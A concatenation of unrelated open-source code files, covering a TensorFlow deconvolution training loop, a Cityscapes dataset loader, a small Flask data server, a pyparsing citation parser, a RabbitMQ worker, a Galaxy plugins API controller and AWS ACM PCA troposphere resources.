if args.psf_mode == 'REAL_PSF':
assert(args.Phase_iters == 0)
# Convolution mode
if args.offset:
assert(len(args.batch_weights) == len(args.theta_base) - 1)
else:
assert(len(args.batch_weights) == len(args.theta_base))
params['conv_fn'] = conv.convolution_tf(params, args)
params['deconv_fn'] = conv.deconvolution_tf(params, args)
## Network architectures
G = select_G(params, args)
G_optimizer = tf.keras.optimizers.Adam(args.G_lr, beta_1=args.G_beta1)
## Construct vgg for perceptual loss
if not args.P_loss_weight == 0:
vgg = tf.keras.applications.VGG19(include_top=False, weights='imagenet')
vgg_layers = [vgg.get_layer(name).output for name in args.vgg_layers.split(',')]
vgg_model = tf.keras.Model(inputs=vgg.input, outputs=vgg_layers)
vgg_model.trainable = False
else:
vgg_model = None
## Saving the model
checkpoint = tf.train.Checkpoint(Phase_optimizer=Phase_optimizer, Phase_var=Phase_var, G_optimizer=G_optimizer, G=G, snr=snr)
max_to_keep = args.max_to_keep
if args.max_to_keep == 0:
max_to_keep = None
manager = tf.train.CheckpointManager(checkpoint, directory=args.save_dir, max_to_keep=max_to_keep)
## Loading pre-trained model if exists
if not args.ckpt_dir == None:
status = checkpoint.restore(tf.train.latest_checkpoint(args.ckpt_dir, latest_filename=None))
status.expect_partial() # Silence warnings
#status.assert_existing_objects_matched() # Only partial load for networks (we don't load the optimizers)
#status.assert_consumed()
## Create summary writer for TensorBoard
summary_writer = tf.summary.create_file_writer(args.save_dir)
## Dataset
train_ds = iter(train_dataset_sim(params['out_width'], params['load_width'], args))
test_ds = list(test_dataset_sim(params['out_width'], params['load_width'], args).take(1))
## Do training
for step in range(args.steps):
start = time.time()
if step % args.save_freq == 0:
print('Saving', flush=True)
manager.save()
if step % args.log_freq == 0:
print('Logging', flush=True)
test_batch = test_ds[0]
img = test_batch[0]
gt_img = test_batch[1]
log(img, gt_img, Phase_var, G, snr, vgg_model, summary_writer, step, params, args)
for _ in range(args.Phase_iters):
img_batch = next(train_ds)
img = img_batch[0]
gt_img = img_batch[1]
train_step('Phase', img, gt_img, Phase_var, Phase_optimizer, G, G_optimizer, snr, vgg_model, params, args)
for _ in range(args.G_iters):
img_batch = next(train_ds)
img = img_batch[0]
gt_img = img_batch[1]
train_step('G', img, gt_img, Phase_var, Phase_optimizer, G, G_optimizer, snr, vgg_model, params, args)
print("Step time: {}\n".format(time.time() - start), flush=True)
## Entry point
def main():
args = parse_args()
train(args)
if __name__ == '__main__':
main()
|
the-stack_0_3835 | import os
import numpy as np
from PIL import Image
from .seg_dataset import SegDataset
from .voc_seg_dataset import VOCMetaInfo
class CityscapesSegDataset(SegDataset):
"""
Cityscapes semantic segmentation dataset.
Parameters:
----------
root : str
Path to a folder with `leftImg8bit` and `gtFine` subfolders.
mode : str, default 'train'
'train', 'val', 'test', or 'demo'.
transform : callable, optional
A function that transforms the image.
"""
def __init__(self,
root,
mode="train",
transform=None,
**kwargs):
super(CityscapesSegDataset, self).__init__(
root=root,
mode=mode,
transform=transform,
**kwargs)
image_dir_path = os.path.join(root, "leftImg8bit")
mask_dir_path = os.path.join(root, "gtFine")
assert os.path.exists(image_dir_path) and os.path.exists(mask_dir_path), "Please prepare dataset"
mode_dir_name = "train" if mode == "train" else "val"
image_dir_path = os.path.join(image_dir_path, mode_dir_name)
# mask_dir_path = os.path.join(mask_dir_path, mode_dir_name)
self.images = []
self.masks = []
for image_subdir_path, _, image_file_names in os.walk(image_dir_path):
for image_file_name in image_file_names:
if image_file_name.endswith(".png"):
image_file_path = os.path.join(image_subdir_path, image_file_name)
mask_file_name = image_file_name.replace("leftImg8bit", "gtFine_labelIds")
mask_subdir_path = image_subdir_path.replace("leftImg8bit", "gtFine")
mask_file_path = os.path.join(mask_subdir_path, mask_file_name)
if os.path.isfile(mask_file_path):
self.images.append(image_file_path)
self.masks.append(mask_file_path)
else:
print("Cannot find the mask: {}".format(mask_file_path))
assert (len(self.images) == len(self.masks))
if len(self.images) == 0:
raise RuntimeError("Found 0 images in subfolders of: {}\n".format(image_dir_path))
self.add_getter('img', self._get_image)
self.add_getter('label', self._get_label)
def _get_image(self, i):
image = Image.open(self.images[i]).convert("RGB")
assert (self.mode in ("test", "demo"))
image = self._img_transform(image)
if self.transform is not None:
image = self.transform(image)
return image
def _get_label(self, i):
if self.mode == "demo":
return os.path.basename(self.images[i])
assert (self.mode == "test")
mask = Image.open(self.masks[i])
mask = self._mask_transform(mask)
return mask
classes = 19
vague_idx = 19
use_vague = True
background_idx = -1
ignore_bg = False
_key = np.array([-1, -1, -1, -1, -1, -1,
-1, -1, 0, 1, -1, -1,
2, 3, 4, -1, -1, -1,
5, -1, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15,
-1, -1, 16, 17, 18])
_mapping = np.array(range(-1, len(_key) - 1)).astype(np.int32)
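    # Added note: _mapping enumerates the raw Cityscapes label ids (-1..33) and
    # _key holds the train id at the same position, e.g. raw labelId 7 (road) -> 0,
    # 26 (car) -> 13, 33 (bicycle) -> 18; entries of -1 are later replaced by
    # vague_idx in _mask_transform.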
@staticmethod
def _class_to_index(mask):
values = np.unique(mask)
for value in values:
assert(value in CityscapesSegDataset._mapping)
index = np.digitize(mask.ravel(), CityscapesSegDataset._mapping, right=True)
return CityscapesSegDataset._key[index].reshape(mask.shape)
@staticmethod
def _mask_transform(mask):
np_mask = np.array(mask).astype(np.int32)
np_mask = CityscapesSegDataset._class_to_index(np_mask)
np_mask[np_mask == -1] = CityscapesSegDataset.vague_idx
return np_mask
def __len__(self):
return len(self.images)
class CityscapesMetaInfo(VOCMetaInfo):
def __init__(self):
super(CityscapesMetaInfo, self).__init__()
self.label = "Cityscapes"
self.short_label = "voc"
self.root_dir_name = "cityscapes"
self.dataset_class = CityscapesSegDataset
self.num_classes = CityscapesSegDataset.classes
self.test_metric_extra_kwargs = [
{"vague_idx": CityscapesSegDataset.vague_idx,
"use_vague": CityscapesSegDataset.use_vague,
"macro_average": False},
{"num_classes": CityscapesSegDataset.classes,
"vague_idx": CityscapesSegDataset.vague_idx,
"use_vague": CityscapesSegDataset.use_vague,
"bg_idx": CityscapesSegDataset.background_idx,
"ignore_bg": CityscapesSegDataset.ignore_bg,
"macro_average": False}]
self.test_net_extra_kwargs = self.net_extra_kwargs
|
the-stack_0_3837 | from flask import Flask, jsonify # 新增代码。装入Flask
import pandas as pd
app = Flask(__name__)  # new code: create the Flask application
@app.route("/")  # new code: "/" is handled by root() below
def root():
return app.send_static_file("visual.html")
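# Added note: the two data endpoints below assume each CSV under ./out/ has at
# least two columns; they return [first_column, second_column] as JSON lists
# consumed by the charts in static/visual.html.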
@app.route("/getData1")
def getData1():
df = pd.read_csv("./out/PeopleInSubwayTime.csv")
data = [df.iloc[:, 0].tolist(), df.iloc[:, 1].tolist()]
print(data)
return jsonify(data)
@app.route("/getData2")
def getData2():
df = pd.read_csv("./out/PeopleInSubwayCount.csv")
data = [df.iloc[:, 0].tolist(), df.iloc[:, 1].tolist()]
print(data)
return jsonify(data)
if __name__ == "__main__":
app.run(host="0.0.0.0", port=80, debug=True)
# eof
|
the-stack_0_3838 | # encoding: utf-8
import pyparsing as pyp
import re
def to_obj(result):
'''Convert nested ParseResults structure to list / dict.
Args:
result (ParseResults) : pyparsing result
Returns:
list / dict containing results
'''
d = result.asDict()
if d:
for k in d:
if isinstance(d[k], pyp.ParseResults):
d[k] = to_obj(d[k])
return d
l = result.asList()
for idx, v in enumerate(l):
if isinstance(v, pyp.ParseResults):
l[idx] = to_obj(v)
return l
def scan(pattern, string):
'''Scan a string for repeated occurrences of a pattern.
Args:
pattern (pyparsing pattern) : pattern to be applied
string (str) : text to be parsed
Returns:
list of matches as list / dict
'''
return [to_obj(match[0]) for match in
pattern.scanString(string)]
# ParseAction functions
def joiner(delim):
return lambda tokens: delim.join(tokens)
def parse_authors_factory(author_splitter, name_splitter):
'''Create a function for splitting author strings.
Args:
author_splitter (str) : pattern for splitting authors
name_splitter (str) : pattern for splitting names w/in an author
Returns:
author-splitter function
'''
def parse_authors(tokens):
authors = []
# Note: Since this action is normally chained after
# a joiner() action, only consider the 0th token
for token in re.split(author_splitter, tokens[0]):
if not token:
continue
token_split = re.split(name_splitter, token)
author = {}
author['family'] = token_split[0]
if len(token_split) > 1:
author['given'] = token_split[1]
authors.append(author)
return authors
return parse_authors
# Character sets
dash_chars = u'-–'
allowed_chars = u',;:\'"’&?!()'
# Elementary patterns
dashes = pyp.Word(dash_chars)
etal = pyp.Combine('et al' + pyp.ZeroOrMore('.'))
number = pyp.Word(pyp.nums)
date = '(' + number.setResultsName('date') + ')' + pyp.Optional('.')
words_neglook = ~date + ~number + ~etal + ~pyp.Literal('http') + ~pyp.Literal('doi')
word = pyp.Word(pyp.alphanums + dash_chars + allowed_chars)
words = pyp.OneOrMore(words_neglook + word).\
setParseAction(joiner(' '))
word_journal = pyp.Word(pyp.alphanums + dash_chars + allowed_chars + '.')
words_journal = pyp.OneOrMore(words_neglook + word_journal).\
setParseAction(joiner(' '))
# Meta-data patterns
# Note: Remember to copy words pattern to avoid
# changing other patterns
authors = pyp.Group(
words_journal.copy().\
addParseAction(parse_authors_factory(',', '\s'))
).setResultsName('author') + \
pyp.Optional(etal)
title = words.\
setResultsName('title')
journal = words_journal.\
setParseAction(joiner(' ')).\
setResultsName('journal-title')
volume = pyp.Optional(
number.\
setResultsName('volume') + \
pyp.Word(',:')
)
page_range = number + pyp.Suppress(dashes) + number
page_plos = pyp.Combine('e' + number)
pages = pyp.Optional(pyp.Group(page_range | page_plos).\
setResultsName('pages'))
doi = pyp.Optional(
pyp.Suppress(
pyp.Optional('doi:') + \
pyp.Optional('http://dx.doi.org/')
) + \
pyp.Regex(r'\b(10[.][0-9]{4,}(?:[.][0-9]+)*/(?:(?!["&\'<>])\S)+)\b')
).setResultsName('doi')
reference = authors + \
date + \
title + \
'.' + \
journal + \
volume + \
pages + \
pyp.Optional('.') + \
doi
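# Added usage sketch (not part of the original module): the sample citation is
# invented for illustration; whether every field matches depends on the grammar
# above, but scan() simply returns whatever reference occurrences it finds.
if __name__ == '__main__':
    sample = (u'Smith J, Doe A (2014). A study of parsing things. '
              u'Journal of Stuff 12, 345-356. doi:10.1000/xyz123')
    for match in scan(reference, sample):
        print(match)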
|
the-stack_0_3839 | #!/usr/bin/env python
import pika
import time
connection = pika.BlockingConnection(pika.ConnectionParameters(
host='rabbit'))
channel = connection.channel()
channel.queue_declare(queue='task_queue', durable=True)
print(' [*] Waiting for messages. To exit press CTRL+C')
def callback(ch, method, properties, body):
print(" [x] Received %r" % body)
time.sleep(body.count(b'.'))
print(" [x] Done")
ch.basic_ack(delivery_tag = method.delivery_tag)
channel.basic_qos(prefetch_count=1)
channel.basic_consume(callback,
queue='task_queue')
channel.start_consuming()
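# Added companion-producer sketch (not part of the original script); it assumes
# the same pika API style used above and a reachable 'rabbit' host, and is left
# commented out because start_consuming() above blocks forever.
#   import pika
#   connection = pika.BlockingConnection(pika.ConnectionParameters(host='rabbit'))
#   channel = connection.channel()
#   channel.queue_declare(queue='task_queue', durable=True)
#   channel.basic_publish(exchange='',
#                         routing_key='task_queue',
#                         body='A new task...',
#                         properties=pika.BasicProperties(delivery_mode=2))
#   connection.close()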
|
the-stack_0_3841 | """
Plugins resource control over the API.
"""
import logging
from galaxy import exceptions
from galaxy.managers import hdas, histories
from galaxy.web import expose_api
from galaxy.webapps.base.controller import BaseAPIController
log = logging.getLogger(__name__)
class PluginsController(BaseAPIController):
"""
RESTful controller for interactions with plugins.
"""
def __init__(self, app):
super().__init__(app)
self.hda_manager = hdas.HDAManager(app)
self.history_manager = histories.HistoryManager(app)
@expose_api
def index(self, trans, **kwargs):
"""
GET /api/plugins:
"""
registry = self._get_registry(trans)
dataset_id = kwargs.get("dataset_id")
if dataset_id is not None:
hda = self.hda_manager.get_accessible(self.decode_id(dataset_id), trans.user)
return registry.get_visualizations(trans, hda)
else:
return registry.get_plugins()
@expose_api
def show(self, trans, id, **kwargs):
"""
GET /api/plugins/{id}:
"""
registry = self._get_registry(trans)
history_id = kwargs.get("history_id")
if history_id is not None:
history = self.history_manager.get_owned(trans.security.decode_id(history_id), trans.user, current_history=trans.history)
result = {"hdas": []}
for hda in history.contents_iter(types=["dataset"], deleted=False, visible=True):
if registry.get_visualization(trans, id, hda):
result["hdas"].append({
"id": trans.security.encode_id(hda.id),
"name": hda.name
})
else:
result = registry.get_plugin(id).to_dict()
return result
def _get_registry(self, trans):
if not trans.app.visualizations_registry:
raise exceptions.MessageException("The visualization registry has not been configured.")
return trans.app.visualizations_registry
|
the-stack_0_3844 | from setuptools import setup, find_packages
import d2l
requirements = [
'jupyter==1.0.0',
'numpy==1.21.5',
'matplotlib==3.5.1',
'requests==2.25.1',
'pandas==1.2.4'
]
setup(
name='d2l',
version=d2l.__version__,
python_requires='>=3.5',
author='D2L Developers',
author_email='[email protected]',
url='https://d2l.ai',
description='Dive into Deep Learning',
license='MIT-0',
packages=find_packages(),
zip_safe=True,
install_requires=requirements,
)
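# Added usage note (assumption, not part of this file): from the repository
# root the package would typically be installed for development with
# `pip install -e .` or packaged with `python setup.py sdist bdist_wheel`.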
|
the-stack_0_3847 | # Copyright (c) 2020, Mark Peek <[email protected]>
# All rights reserved.
#
# See LICENSE file for full license.
from . import AWSObject, AWSProperty, Tags
from .validators import (boolean, integer)
VALID_SIGNIN_ALGORITHM = ('SHA256WITHECDSA', 'SHA256WITHRSA',
'SHA384WITHECDSA', 'SHA384WITHRSA',
'SHA512WITHECDSA', 'SHA512WITHRSA')
VALID_VALIDITY_TYPE = ('ABSOLUTE', 'DAYS', 'END_DATE',
'MONTHS', 'YEARS')
VALID_KEY_ALGORITHM = ('EC_prime256v1', 'EC_secp384r1',
'RSA_2048', 'RSA_4096')
VALID_CERTIFICATEAUTHORITY_TYPE = ('ROOT', 'SUBORDINATE')
def validate_validity_type(validity_type):
"""Certificate Validity Type validation rule."""
if validity_type not in VALID_VALIDITY_TYPE:
raise ValueError("Certificate Validity Type must be one of: %s" %
", ".join(VALID_VALIDITY_TYPE))
return validity_type
def validate_signing_algorithm(signing_algorithm):
"""Certificate SigningAlgorithm validation rule."""
if signing_algorithm not in VALID_SIGNIN_ALGORITHM:
raise ValueError("Certificate SigningAlgorithm must be one of: %s" %
", ".join(VALID_SIGNIN_ALGORITHM))
return signing_algorithm
def validate_key_algorithm(key_algorithm):
"""CertificateAuthority KeyAlgorithm validation rule."""
if key_algorithm not in VALID_KEY_ALGORITHM:
raise ValueError("CertificateAuthority KeyAlgorithm must be one of: %s" % # NOQA
", ".join(VALID_KEY_ALGORITHM))
return key_algorithm
def validate_certificateauthority_type(certificateauthority_type):
"""CertificateAuthority Type validation rule."""
if certificateauthority_type not in VALID_CERTIFICATEAUTHORITY_TYPE:
raise ValueError("CertificateAuthority Type must be one of: %s" %
", ".join(VALID_CERTIFICATEAUTHORITY_TYPE))
return certificateauthority_type
class Validity(AWSProperty):
props = {
'Type': (validate_validity_type, True),
'Value': (integer, True),
}
class Certificate(AWSObject):
resource_type = "AWS::ACMPCA::Certificate"
props = {
'CertificateAuthorityArn': (basestring, True),
'CertificateSigningRequest': (basestring, True),
'SigningAlgorithm': (validate_signing_algorithm, True),
'TemplateArn': (basestring, False),
'Validity': (Validity, True),
}
class CertificateAuthorityActivation(AWSObject):
resource_type = "AWS::ACMPCA::CertificateAuthorityActivation"
props = {
'Certificate': (basestring, True),
'CertificateAuthorityArn': (basestring, True),
'CertificateChain': (basestring, False),
'Status': (basestring, False),
}
class CrlConfiguration(AWSProperty):
props = {
'CustomCname': (basestring, False),
'Enabled': (boolean, False),
'ExpirationInDays': (integer, False),
'S3BucketName': (basestring, False),
}
class RevocationConfiguration(AWSProperty):
props = {
'CrlConfiguration': (CrlConfiguration, False)
}
class Subject(AWSProperty):
props = {
'CommonName': (basestring, False),
'Country': (basestring, False),
'DistinguishedNameQualifier': (basestring, False),
'GenerationQualifier': (basestring, False),
'GivenName': (basestring, False),
'Initials': (basestring, False),
'Locality': (basestring, False),
'Organization': (basestring, False),
'OrganizationalUnit': (basestring, False),
'Pseudonym': (basestring, False),
'SerialNumber': (basestring, False),
'State': (basestring, False),
'Surname': (basestring, False),
'Title': (basestring, False),
}
class CertificateAuthority(AWSObject):
resource_type = "AWS::ACMPCA::CertificateAuthority"
props = {
'KeyAlgorithm': (validate_key_algorithm, True),
'RevocationConfiguration': (RevocationConfiguration, False),
'SigningAlgorithm': (validate_signing_algorithm, True),
'Subject': (Subject, True),
'Tags': (Tags, False),
'Type': (validate_certificateauthority_type, True),
}
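# Added usage sketch (not part of the original module): assumes this file is
# importable as ``troposphere.acmpca`` next to the main ``troposphere`` package;
# names mirror the classes defined above.
#   from troposphere import Template
#   from troposphere.acmpca import CertificateAuthority, Subject
#   t = Template()
#   t.add_resource(CertificateAuthority(
#       "RootCA",
#       KeyAlgorithm="RSA_2048",
#       SigningAlgorithm="SHA256WITHRSA",
#       Type="ROOT",
#       Subject=Subject(CommonName="example.com"),
#   ))
#   print(t.to_json())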
|